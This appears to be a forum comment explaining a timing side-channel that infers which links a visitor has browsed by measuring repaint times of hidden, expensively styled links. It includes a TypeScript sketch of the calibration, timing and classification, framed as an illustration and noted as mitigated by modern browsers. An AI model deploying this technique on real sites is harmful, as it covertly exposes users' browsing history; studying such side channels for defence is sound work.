
I'm measuring the time it takes the browser to render a known visited link (this page) and a known unvisited link (a random URL). Once it has calibrated itself, it goes through every link in the list and measures how long the browser takes to render each one; the longer the time, the higher the chance the link was visited. It then loosely compares those times against the calibration values. It also uses some expensive CSS to slow the browser down, like a large box-shadow and opacity. All the links are hidden with opacity and absolute positioning, but they're technically still visible, so the browser does render them.
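For the curious, here's a rough sketch of that idea in TypeScript. Everything in it (the nextFrame/measureRenderTime helpers, the style values, the threshold logic) is my own illustrative reconstruction of what the comment describes, not the actual code, and modern browsers have since restricted :visited styling and repaint timing to defeat exactly this, so treat it as a sketch of the technique rather than a working exploit:

    // Expensive-to-paint style applied to every probed link.
    const EXPENSIVE_STYLE = `
      position: absolute;  /* hidden but still rendered */
      opacity: 0.01;
      box-shadow: 0 0 150px 150px rgba(0, 0, 0, 0.5);  /* slow to paint */
    `;

    // Resolve after the next frame containing our DOM change has been
    // painted, reporting the elapsed time. Double requestAnimationFrame
    // is a common trick to get past the paint.
    function nextFrame(): Promise<number> {
      return new Promise(resolve => {
        const start = performance.now();
        requestAnimationFrame(() =>
          requestAnimationFrame(() => resolve(performance.now() - start))
        );
      });
    }

    // Insert a link and measure how long the browser takes to render it,
    // taking the median over a few samples to smooth out noise.
    async function measureRenderTime(url: string, samples = 5): Promise<number> {
      const times: number[] = [];
      for (let i = 0; i < samples; i++) {
        const a = document.createElement("a");
        a.href = url;
        a.textContent = url;
        a.style.cssText = EXPENSIVE_STYLE;
        document.body.appendChild(a);
        times.push(await nextFrame());
        a.remove();
        await nextFrame();  // let the removal settle before the next sample
      }
      times.sort((x, y) => x - y);
      return times[Math.floor(times.length / 2)];
    }

    async function sniffHistory(candidates: string[]) {
      // Calibrate: the current page is known-visited, a random URL is not.
      const visitedBaseline = await measureRenderTime(location.href);
      const unvisitedBaseline = await measureRenderTime(
        `https://example.invalid/${Math.random()}`
      );
      const threshold = (visitedBaseline + unvisitedBaseline) / 2;

      for (const url of candidates) {
        const t = await measureRenderTime(url);
        // Slower repaint => closer to the visited baseline => likely visited.
        console.log(`${url}: ${t.toFixed(2)}ms`,
          t > threshold ? "probably visited" : "probably not visited");
      }
    }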

